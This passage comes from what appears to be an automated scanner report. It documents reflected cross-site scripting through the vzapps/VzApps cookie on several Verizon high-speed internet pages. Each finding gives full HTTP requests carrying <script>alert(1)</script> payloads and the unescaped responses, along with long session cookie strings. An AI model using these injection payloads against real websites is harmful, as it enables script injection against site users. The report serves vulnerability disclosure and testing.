Cookie: Source=CHSI; vzapps=STATE=TX85766<script>alert(1)</script>8553ba7b684; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 92738
Expires: Sat, 20 Nov 2010 00:12:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:22 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX85766<script>alert(1)</script>8553ba7b684; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Features &amp; Services
</title><meta name="keywords" content="verizon high speed internet features, verizon features
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX85766<SCRIPT>ALERT(1)</SCRIPT>8553BA7B684 </DIV>
...[SNIP]...

3.194. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c5b24'><script>alert(1)</script>d2df3510f80 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXc5b24'><script>alert(1)</script>d2df3510f80; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 92742
Expires: Sat, 20 Nov 2010 00:12:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:19 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXc5b24'><script>alert(1)</script>d2df3510f80; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Features &amp; Services
</title><meta name="keywords" content="verizon high speed internet features, verizon features
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC5B24'><SCRIPT>ALERT(1)</SCRIPT>D2DF3510F80 ' />
...[SNIP]...

3.195. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/ [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 790ec<script>alert(1)</script>1fb2881387e was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX790ec<script>alert(1)</script>1fb2881387e; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67985
Expires: Sat, 20 Nov 2010 03:15:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:15:00 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX790ec<script>alert(1)</script>1fb2881387e; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX790EC<SCRIPT>ALERT(1)</SCRIPT>1FB2881387E </DIV>
...[SNIP]...

3.196. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/ [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8e301'><script>alert(1)</script>715a473175c was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX8e301'><script>alert(1)</script>715a473175c; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67990
Expires: Sat, 20 Nov 2010 03:14:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:38 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX8e301'><script>alert(1)</script>715a473175c; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8E301'><SCRIPT>ALERT(1)</SCRIPT>715A473175C ' />
...[SNIP]...

3.197. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1bbd6'><script>alert(1)</script>c865fc14b77 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX1bbd6'><script>alert(1)</script>c865fc14b77; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68022
Expires: Sat, 20 Nov 2010 03:14:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:25 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX1bbd6'><script>alert(1)</script>c865fc14b77; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX1BBD6'><SCRIPT>ALERT(1)</SCRIPT>C865FC14B77 ' />
...[SNIP]...

3.198. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload e9fda<script>alert(1)</script>0b8d7546ca4 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXe9fda<script>alert(1)</script>0b8d7546ca4; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; 